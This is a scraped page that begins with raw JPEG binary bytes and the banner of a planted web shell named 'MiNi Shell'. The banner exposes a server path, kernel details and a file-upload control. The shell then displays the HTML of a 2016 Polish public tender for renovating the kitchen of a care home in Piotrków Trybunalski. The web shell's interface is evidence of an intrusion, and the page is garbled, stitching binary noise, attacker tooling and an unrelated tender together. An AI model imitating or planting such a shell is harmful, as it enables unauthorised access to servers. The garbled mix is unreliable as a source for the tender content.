JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160601/64325-N-2016.html

<p class="kh_header"><b>Piotrków Trybunalski: Remont pomieszczenia kuchni głównej w Domu Pomocy Społecznej w Piotrkowie Trybunalskim - wymiana okładzin ścian w kuchni głównej, wymiana posadzki w kuchni głównej, roboty wodno - kanalizacyjne w kuchni głównej, roboty elektryczne w kuchni głównej</b><br>
<b>Numer ogłoszenia: 64325 - 2016; data zamieszczenia: 01.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Żwirki 5/7, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 647 51 72, faks 044 647 09 98.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.dompomocypiotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczenia kuchni głównej w Domu Pomocy Społecznej w Piotrkowie Trybunalskim - wymiana okładzin ścian w kuchni głównej, wymiana posadzki w kuchni głównej, roboty wodno - kanalizacyjne w kuchni głównej, roboty elektryczne w kuchni głównej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólny zakres robót ( określony w załączonym : kosztorysie ofertowym, obmiarze robót, specyfikacji technicznej ogólnej wykonania i odbioru robót budowlanych remontowych w pomieszczeniu kuchni budynku Domu Pomocy Społecznej w Piotrkowie Tryb. przy ul. Żwirki 5/7. ) :

1.1. Wymiana okładzin ścian w kuchni:
- Rozebranie okładziny ściennej z płytek ceramicznych - 186,93 m2,
- Gruntowanie podłoży preparatami CERESIT CT 17 i ATLAS UNI GRUNT lub równoważnymi - powierzchnie pionowe - 186,93 m2,
-Tynki wewnętrzne zwykłe kat. II wykonywane ręcznie na podłożu z cegły i pustaków cegły i pustaków na ścianach o powierzchni podłogi ponad 5 m2 - 186,93 m2,
- Gruntowanie podłoży preparatami CERESIT CT 1 i ATLAS UNI GRUNT lub równoważnymi  - powierzchnie pionowe - 186,93 m2,
- Licowanie ścian płytkami z kamieni sztucznych o wymiarach 30x30 cm na zaprawie klejowej analogi do płytek 25x40 - 180,28 m2,
- Cokoliki z kształtek z kamieni sztucznych na zaprawie klejowej - 66,52 m,
- Obsadzenie kratek wentylacyjnych w ścianach z cegieł - 3 szt.,
- Transport gruzu z terenu rozbiórki przy ręcznym załadowaniu i wyładowaniu samochodem skrzyniowym na odległość do 1 km - 8,41 m3,
- Transport gruzu z terenu rozbiórki przy ręcznym załadowaniu i wyładowaniu samochodem ciężarowym- dodatek za każdy następny rozpoczęty1 km dodatek za 9 km 8.41-9 - 75,69 m3.
- Kolorystyka płytek ściennych do ustalenia z Zamawiającym.
1.2. Wymiana posadzki w kuchni:
- Rozebranie posadzki z płytek na zaprawie cementowej - 73,25 m2,
- Gruntowanie podłoży preparatami CERESIT CT 17 i ATLAS UNI GRUNT lub równoważnymi  - powierzchnie poziome - 73,25 m2,
- Warstwy wyrównujące i wygładzające z zaprawy samopoziomującej grubości 5 mm wykonywane w pomieszczeniach o powierzchni ponad 8 m2 - 73.25 m2,
- Warstwy wyrównujące i wygładzające z zaprawy samopoziomującej - dodatek lub potrącenie za zmianę grubości o 1 mm 73.25-5 - 366,25 m2,
- Gruntowanie ręczne - 73,25 m2,
- Pozioma izolacja podpłytkowa przeciwwilgociowa grubości 1 mm z polimerowej masy uszczelniającej (folii w płynie) wykonywana ręcznie - 73,25 m2,
- Dodatek za wklejanie taśm uszczelniających na bitumiczną masę KMB lub masę polimerową - 66,52 m,
- Posadzki jednobarwne z płytek podłogowych  GRES o V-tej klasie ścieralności, antypoślizgowość R 12 V 4, minimalna grubość 8 mm, nieszkliwione, nasiąkliwość nie więcej niż 0,5%, wymiary 30cm x 30cm jak również 33 cm x 33 cm na zaprawie klejowej o grubości warstwy 5 mm w pomieszczeniach o powierzchni ponad 10 m2 - 73,25 m2,
- Kolorystyka płytek podłogowych GRES do ustalenia z Zamawiającym,
- Transport gruzu z terenu rozbiórki przy ręcznym załadowaniu i wyładowaniu samochodem skrzyniowym na odległość do 1 km - 4,40 m3,
- Transport gruzu z terenu rozbiórki przy ręcznym załadowaniu i wyładowaniu samochodem ciężarowym-dodatek za każdy następny rozpoczęty 1 km dodatek za 9 km 4,40 -9 - 39,60 m3.
1.3. Roboty wodno - kanalizacyjne:
- Demontaż wpustu żeliwnego podłogowego śr. 50 mm lub piwnicznego śr. 100 mm - 4 szt.,
- Wpusty żeliwne podłogowe o śr. 50 mm - 4 szt.,
- Demontaż rurociągu z PVC o śr. do 50 mm na ścianach budynku - 1,5 m,
- Demontaż zaworu czerpalnego (wypływowego) bez korkowania podejścia o śr. 15-20 mm. 
- Demontaż zaworu czerpalnego przy kotle do podgrzewania wody - 1 szt.,
- Demontaż rurociągu stalowego ocynkowanego o śr. 15-20 mm. Demontaż przyłącza wody do kotła do podgrzewania wody - 2 m,
- Demontaż rurociągu stalowego o połączeniach spawanych o średnicy 32 mm. Demontaż zasilania i powrotu kotła parowego - 2 m,
- Rurociągi z PVC kanalizacyjne o śr. 50 mm w gotowych wykopach, wewnątrz budynków o połączeniach wciskowych - 1,5 m,
- Dodatki za wykonanie podejść odpływowych z PVC o średnicy 50 mm o połączeniach wciskowych - 1 podejście,
- Rurociągi stalowe ocynkowane o średnicy nominalnej 20 mm o połączeniach gwintowanych, na ścianach w budynkach mieszkalnych. Wykonanie nowego podejścia do kotła do podgrzewania wody - 2 m,
- Dodatki za podejścia dopływowe w rurociągach stalowych do zaworów czerpalnych, baterii, mieszaczy, hydrantów itp. o połączeniu sztywnym o średnicy nominalnej 20 mm - 1 szt.,
- Mechaniczne przebijanie otworów w ścianach lub stropach betonowych o długości przebicia do 40 cm - średnicy rury do 100 mm - 1 otwór,
- Mechaniczne przebijanie otworów w ścianach lub stropach betonowych o długości przebicia do 40 cm - średnicy rury do 25 mm - 1 otwór ,
- Demontaż taboretu gazowego - 2 szt.,
- Taboret gazowy. Dostawa inwestora. - 2 szt.,
- Próba instalacji gazowej na ciśnienie dla wykonawcy i dostawcy gazu za gazomierzem w budynkach mieszkalnych - 1 lokal.
1.4. Roboty elektryczne:
- Mechaniczne przebijanie otworów w ścianach lub stropach betonowych o długości przebicia do 40 cm - średnica rury do 100 mm. Otwór w stropie - 1 otwór,
- Mechaniczne przebijanie otworów w ścianach lub stropach betonowych o długości przebicia do 40 cm - średnicy rury do 25 mm. Wykonanie otworu w ścianie o grubości ok. 1,00 m - 2,5 otworów,
- Ręczne wykucie bruzd dla przewodów wtynkowych w betonie - 1,5 m,
- Wykonanie pasów tynku zwykłych kat. III o szerokości do 10 cm na murach z cegieł lub ścianach z betonu pokrywanie bruzdy z przewodami elektrycznymi - 1,5 m,
- Przewody kabelkowe w powłoce polwinitowej (łączny przekrój żył Cu-24-Al-40 mm2) układane na gotowych uchwytach bezśrubowych, w korytkach i na drabinkach z mocowaniem pojedynczo - 9 m,
- Przewody kabelkowe n.t. w powłoce polwinitowej (łączny przekrój żył do 24-Cu- 40-Almm2) mocowane paskami lub klamerkami na przygotowanym podłożu - 9 m,
- Montaż na gotowym podłożu wyłącznika nadmirowo-prądowego z podłączeniem - 1 szt.,
- Aparaty elektryczne o masie do 50 kg. Montaż kotła elektrycznego do podgrzewania wody - 1 szt.,
- Demontaż opraw świetlówkowych z rastrem z tworzyw sztucznych lub metalowym - 11 szt.,
- Oprawy świetlówkowe o masie do 15 kg mocowane na lince nośnej (2 świetlówki). Montaż nowych opraw oświetleniowych. Materiały inwestora - 11 kpl.,
- Demontaż gniazd bezpiecznikowych uniwersalnych 3 biegunowych ze ściany dla prądu do 25 A. - - Demontaż gniazda 16A przy kuchni elektrycznej - 1 szt.,
- Ręczne wykucie bruzd dla przewodów wtynkowych w betonie pod nową instalację wtyczkową 1.20+0.50+4.20 - 5,9 m,
- Wykonanie pasów tynku zwykłego kat.III o szer. do 10 cm na murach z cegieł lub ścianach z betonu pokrywanie bruzdy z przewodami elektrycznymi - 5,9 m,
- Przygotowanie podłoża pod osprzęt instalacyjny mocowany przez przykręcenie do kołków plastykowych osadzonych w podłożu betonowym - 3 szt.,
- Przewody kabelkowe o łącznym przekroju żył do 7.5 mm2 układane w listwach i kanałach elektroinstalacyjnych - 5,9 m,
- Gniazda instalacyjne wtyczkowe ze stykiem ochronnym natynkowe 2-biegunowe przykręcane o obciążalności do 16 A i przekroju przewodów do 2.5 mm2 - 8 szt.,
- Ręczne wykucie bruzd dla przewodów wtynkowych w betonie pod nową instalację wtyczkową - 1,50 m,
- Wykonanie pasów tynku zwykłego kat. III o szer. do 10 cm na murach z cegieł lub ścianach z betonu pokrywanie .bruzdy z przewodami elektrycznymi - 1,5 m,
- Przewody kabelkowe o łącznym przekroju żył do 12.5 mm2 układane w listwach i kanałach elektroinstalacyjnych. Schowanie istniejącego przewodu pod tynk - 1,5 m,
- Wykonanie demontażu i ponownego montażu gniazd przy patelniach elektrycznych 2 szt. i kociołkach elektrycznych 1 szt. - 3 kpl.,
- Pomiar rezystancji izolacji instalacji elektrycznej - obwód 1-fazowy (pomiar pierwszy) - 1 pomiar,
- Pomiar rezystancji izolacji instalacji elektrycznej - obwód 1-fazowy (każdy na- stępny pomiar) - 7 pomiar,
- Pomiar rezystancji izolacji instalacji elektrycznej - obwód 3-fazowy (pomiar pierwszy) - 1 pomiar,
- Sprawdzenie samoczynnego wyłączania zasilania (pierwsza próba) - 1 próba,
- Badania i pomiary instalacji skuteczności zerowania (pierwszy pomiar) - 1 szt.,
- Badania i pomiary instalacji skuteczności zerowania (każdy następny pomiar) - 3 szt.,
- Badania i pomiary instalacji uziemiającej (pierwszy pomiar) - 1 szt.,
- Badania i pomiary instalacji uziemiającej (każdy następny pomiar) - 7 szt.
2. Warunki udziału Wykonawcy w postępowaniu przetargowym:
- Wykonawca powinien posiadać uprawnienia do wykonywania określonej działalności lub czynności,
- Wykonawca powinien posiadać niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia,
- Wykonawca powinien dysponować odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania przedmiotu zamówienia,
- Wykonawca powinien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia,
- Zamawiający zastrzega ,że kluczowe części zamówienia mogą być wykonane wyłącznie przez Wykonawce ( wymiana okładzin w kuchni i wymiana posadzki).
- Wykonawca może powierzyć wykonanie pozostałych robót budowlanych podwykonawcom.
- Wykonawca zobowiązany jest do wskazania w ofercie części zamówienia , którą zamierza powierzyć podwykonawcom ( jeżeli dotyczy) art. 36 a ustawy prawo zamówień publicznych.
Zabezpieczenie interesów Zamawiającego i osób trzecich:
- Wykonawca jest zobowiązany do prowadzenia robót w sposób zapewniający ochronę własności publicznej i prywatnej. Wykonawca odpowiada za wszelkie spowodowane przez niego działania zniszczenia, uszkodzenia mienia prywatnego i publicznego. Wykonawca w przypadku zaistnienia takich zniszczeń i uszkodzeń usunie je na własny koszt lub pokryje koszty spowodowanych strat.
Warunki bezpieczeństwa pracy i ochrony przeciwpożarowej:
- Podczas realizacji robót Wykonawca odpowiada za przestrzeganie przepisów dotyczących bezpieczeństwa i higieny pracy i ochrony przeciwpożarowej.
Wymagania dotyczące właściwości wyrobów budowlanych:
- Przy wykonaniu zamówienia należy stosować wyroby budowlane dopuszczone do obrotu powszechnego i stosowania w budownictwie. Wykonawca zapewni Zamawiającemu w każdym momencie możliwość kontroli jakości właściwości stosowanych materiałów oraz zapewni bieżące okazywanie się dokumentami potwierdzającymi dopuszczenia do stosowania (aprobaty techniczne, certyfikaty).
- Wymagania ogólne dotyczące przechowywania, transportu, warunków dostaw, składowania wyrobów i materiałów:
- Zamawiający nie przewiduje możliwości składowania wyrobów i materiałów w miejscu montażu. Miejsce, sposób ewentualnego składowania oraz warunki dostaw Zamawiający pozostawia w zakresie działania Wykonawcy, który powinien zapewnić właściwe składowanie i zabezpieczenie oraz dostawę na miejsce montażu na własny koszt zgodnie z obowiązującymi przepisami i przyjętymi standardami, zapewniającymi utrzymanie właściwej jakości i bezpieczeństwa.
- Wariantowe stosowanie wyrobów i materiałów:
- Zamawiający nie przewiduje wariantowego zastosowania wyrobów i materiałów.
- Wymagania dotyczące sprzętu i maszyn do wykonywania robót:
- Wykonawca jest zobowiązany do używania takiego sprzętu, jaki nie spowoduje niekorzystnego wpływu na jakość robót.
Wymagania dotyczące środków transportowych:
- Wykonawca jest zobowiązany do używania takich środków transportowych, jakie nie spowodują uszkodzeń przewożonych wyrobów i materiałów.
Ogólne wymagania dotyczące wykonania robót:
- Wykonawca jest odpowiedzialny za prowadzenie robót zgodnie z umową, obowiązującymi przepisami, wymaganiami specyfikacji wykonania robót budowlanych oraz poleceniami przedstawiciela Zamawiającego.
Opis kontroli i odbioru robót:
- Wykonawca jest odpowiedzialny za pełną kontrolę robót, jakości wyrobów i materiałów budowlanych.
Odbiór robót zanikających i ulegających zakryciu:
- Wykonawca jest zobowiązany do powiadomienia przedstawiciela Zamawiającego o gotowości danej części robót zanikających i ulegających zakryciu do kontroli i odbioru.
Odbiór końcowy:
- Zakończenie robót oraz gotowość do odbioru końcowego musi być zgłoszona na piśmie do Zamawiającego. Odbiór końcowy nastąpi w terminie, który zostanie wyznaczony zgodnie z zapisem w umowie na wykonanie zamówienia. Odbioru końcowego dokona komisja wyznaczona przez Zamawiającego przy udziale przedstawiciela Wykonawcy. Komisja dokona oceny jakościowej i ilościowej wykonanych robót na podstawie dokumentów odbiorowych dokonując szczegółowych oględzin, oceny wizualnej oraz niezbędnych pomiarów i badań elektrycznych i gazowych.
Dokumenty do odbioru prac:
- Do odbioru robót będą wymagane certyfikaty, aprobaty dotyczące materiałów, karty gwarancyjne.
Zaleca się, by Oferent dokonał wizji lokalnej na obiekcie przed sporządzeniem kosztorysu ofertowego w celu uniknięcia ewentualnych błędów w wycenie robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą:
spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z
postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów
zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą:
spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z
postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów
zawartych w ofercie.
Wykaże co najmniej trzy zrealizowane zamówienia (wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia o 
wartości każdej nie mniejszej niż wartość brutto zaoferowana w niniejszym postępowaniu, wraz z załączeniem dokumentów potwierdzających, że  roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. - wg załącznika nr 5.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą:
spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z
postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów
zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą:
spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z
postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów
zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą:
spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z
postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów
zawartych w ofercie.
Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 70.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1.
- Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza).
- W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia 
    albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego
zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza).
- Oświadczenie, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 4.
- Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1
oraz ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 3.
- Pełnomocnictwo do reprezentowania wykonawcy - jeśli nie wynika to z zapisów w odpisie z rejestru lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej.
- Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego - załącznik nr 2.
- Oświadczenie wykonawcy o przynależności do grupy kapitałowej - wg załącznika nr 6.
- Zakres robót do powierzenia podwykonawcom - wg załącznika nr 7.
